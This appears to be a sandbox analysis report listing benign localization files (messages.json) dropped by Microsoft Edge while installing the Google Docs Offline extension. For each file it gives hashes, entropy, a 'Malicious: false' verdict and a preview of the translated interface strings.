SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
